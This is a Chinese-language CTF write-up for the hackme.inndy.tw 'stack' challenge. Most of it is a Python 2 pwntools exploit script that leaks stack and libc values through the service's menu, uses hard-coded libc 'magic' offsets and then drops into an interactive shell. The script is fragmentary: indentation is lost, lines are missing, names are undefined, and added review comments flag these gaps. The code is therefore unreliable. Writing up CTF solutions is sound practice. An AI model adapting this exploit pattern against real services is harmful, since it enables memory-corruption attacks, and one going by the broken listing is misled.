# stack的wp

https://hackme.inndy.tw/scoreboard/ 上的题目很有趣。我做了其中的 stack 这道题，感觉还不错，所以把 wp（writeup）分享出来，方便大家学习。
stack的题目要求是：

nc hackme.inndy.tw 7716

Here is my C programming homework
But compiled with full protection (RELRO, PIE, NX, Stack Canary).
You can pwn it! Can't you?
https://github.com/Inndy/NTUST-CSIE-Homework/blob/master/C_Programming/2014-11-18/HW1118_B10315005_02.c

from pwn import *
import sys, os
import ctypes as ct

# Size bookkeeping for the target; the script starts from 32-bit assumptions
# (4-byte words, 2-byte half-words).
wordSz, hwordSz, bits = 4, 2, 32

# NOTE(review): PIE is left at 0 although the task text says the binary is
# built with PIE; how this flag is used is not visible in this listing.
PIE, mypid = 0, 0

# Two constants, one per libc build (per the author's labels). Presumably
# offsets into libc; if so, each is only valid for the exact build it was
# taken from -- confirm before reusing.
remoteMAGIC = 0x0003AC49      # remote libc
localMAGIC = 0x0003AC69      # local libc

# pwntools settings: 32-bit x86 Linux target. 'debug' logging echoes the raw
# traffic, so the session output is verbose.
context(arch='i386', os='linux', log_level='debug')

# NOTE(review): fragment. The definition that encloses this line and the body
# of the `with` are missing from the page, so it cannot run as shown. It opens
# /proc/<mypid>/mem for reading; presumably it belongs to the `leak` helper
# that findModuleBase calls -- confirm against the author's full script.
# mypid is still 0 at module level, so this only makes sense inside a function
# that runs after mypid has been set.
with open('/proc/%s/mem' % mypid) as mem:

# NOTE(review): the indentation was lost and several lines are missing from
# this listing (`name`, `addr` and `leak` are never defined in the visible
# text, and no return statement survives), so the comments below describe only
# what the remaining lines show.
def findModuleBase(pid, mem):
# Walk the memory map of the process (/proc/<pid>/maps), one mapping per line.
with open('/proc/%s/maps' % pid) as maps:
for line in maps:
# Consider only the mappings whose line mentions `name`.
if name in line:
# Read one byte at addr + 4. If addr is the start of an ELF image, that byte
# is EI_CLASS from the ELF header (2 = 64-bit) -- TODO confirm what addr holds.
bitFormat = u8(leak(addr + 4, 1))
if bitFormat == 2:
# Switch the module-level size settings from their 32-bit defaults to 64-bit.
global wordSz
global hwordSz
global bits
wordSz = 8
hwordSz = 4
bits = 64
# Exit with status 1; presumably the path taken when no matching module was
# found (the lines in between are missing) -- confirm.
sys.exit(1)

# NOTE(review): the `def` line of this debugging helper is missing from the
# page; `addr` is presumably its parameter. The steps read /proc/<pid>/mem and
# attach gdb, so they presumably only make sense when `r` is a process on the
# local machine (the commented-out process(...) line), not the remote tube.
global mypid
# Record the PID of the process behind the tube `r` (first match).
mypid = proc.pidof(r)[0]
# Pause until the operator presses Enter.
raw_input('debug:')
with open('/proc/%s/mem' % mypid) as mem:
moduleBase = findModuleBase(mypid, mem)
# Attach gdb with a breakpoint at moduleBase + addr: the breakpoint is given
# relative to the base found at run time (the task text says the binary is
# built with PIE).
gdb.attach(r, "set follow-fork-mode parent\nb *" + hex(moduleBase+addr))

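def tohex(val, nbits):
    """Return the hex string of *val* reduced modulo 2**nbits.

    For a negative *val* this is its two's-complement bit pattern at a width
    of *nbits* bits, e.g. ``tohex(-1, 32)`` gives ``'0xffffffff'``.

    Args:
        val: Integer to format; may be negative.
        nbits: Width in bits that the value is wrapped to.

    Returns:
        The wrapped value formatted by ``hex()``.
    """
    # Masking with 2**nbits - 1 is the same as (val + 2**nbits) % 2**nbits
    # for Python integers, including negative ones.
    mask = (1 << nbits) - 1
    return hex(val & mask)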

# Local run of the binary, left commented out by the author.
#r = process('/home/h11p/hackme/stack')

# Connect to the challenge service given in the task text.
r = remote('hackme.inndy.tw', 7716)

# Load the author's local copy of the binary (hard-coded path from the
# author's machine) and print the address of its .bss section.
# NOTE(review): the task text says the binary is built with PIE; for a PIE
# file this value is presumably an offset from the load base rather than a
# run-time address -- confirm. The print statement is Python 2 syntax.
elf = ELF('/home/h11p/hackme/stack')
print "bss:"+hex(elf.bss())

# NOTE(review): indentation is lost and lines are missing in this part of the
# listing, so the loop body and the handling of the replies cannot be fully
# recovered from the page. Comments describe only what is visible.
# Wait for the menu prompt.
r.recvuntil('Cmd >>\n')
# Send the menu command 'i' followed by the value '1234', then read and
# discard whatever has been received.
r.sendline('i')
r.sendline('1234')
r.recv()
# Send the menu command 'p' fifteen times, reading one reply per iteration.
# A bare recv() returns whatever has arrived so far, so reply boundaries are
# not guaranteed.
for i in xrange(0,15):
r.sendline("p")
myrecv=r.recv()

# Iterations 4, 7 and 13 are singled out and labelled with their index; the
# statements that printed or parsed the corresponding replies are missing.
if i==4:
print str(i)+":",
elif i==7:
print str(i) + ":",
elif i==13:
print str(i) + ":",

# remotelibc
# NOTE(review): libc_module is never assigned in the visible text; the lines
# that derived it are missing, so this print raises NameError as shown.
print "libc_module:" + libc_module

# The triple-quoted string below holds the author's disabled local-libc
# variant; as a bare string expression it has no effect at run time.
'''
#locallibc
print "libc_module:" + libc_module
'''
# Six more rounds: print the round number, send the menu command 'i' and read
# the reply. NOTE(review): the first 'i' in this script was followed by a
# value line; any value lines sent here are not shown -- presumably missing.
for j in xrange(0,6):
print "this is:"+str(j)
r.sendline('i')
r.recv()

# One further 'i' whose reply is deliberately not read here (the recv is
# commented out).
r.sendline('i')
#r.recv()

# Hand the connection over to the operator's terminal.
r.interactive()